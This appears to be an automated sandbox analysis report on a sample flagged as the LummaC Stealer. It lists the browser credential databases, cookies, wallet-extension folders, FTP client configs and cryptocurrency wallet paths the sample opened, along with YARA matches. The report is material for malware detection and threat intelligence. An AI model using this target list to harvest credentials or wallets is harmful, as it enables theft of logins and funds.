                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                  Source: Yara matchFile source: 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1422795578.0000000003018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1463835898.0000000003023000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1406718329.000000000301E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1406688611.0000000003016000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1422167219.0000000003016000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1437998626.0000000003014000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PqSIlYOaIF.exe PID: 7908, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: PqSIlYOaIF.exe PID: 7908, type: MEMORYSTR
                  Source: Yara matchFile source: 3.2.PqSIlYOaIF.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.PqSIlYOaIF.exe.400000.1.raw.unpack, type: UNPACKEDPE
